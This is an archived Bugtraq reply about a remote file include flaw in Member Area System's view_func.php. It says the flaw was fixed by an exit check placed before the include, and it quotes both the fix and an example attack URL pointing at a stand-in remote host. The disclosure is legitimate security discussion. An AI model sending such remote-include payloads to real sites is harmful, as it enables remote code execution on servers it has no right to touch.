lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 18 Jan 2008 17:01:36 -0000
From: m3venge@...oo.com
To: bugtraq@...urityfocus.com
Subject: Re: Member Area System (MAS) Remote File Include Vulnerability
 (view_func.php)

in the latest version this is already fixed, for almost a year.

  if (strpos ($_SERVER['PHP_SELF'], 'view_func.php') !== false)
  {
    exit ();
  }

before the include!

http://affectedsite.com/view_func.php?i=http://remotesite.com/justsomedi
r/&l=testfile.txt?
view_func.php will exit before the include.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ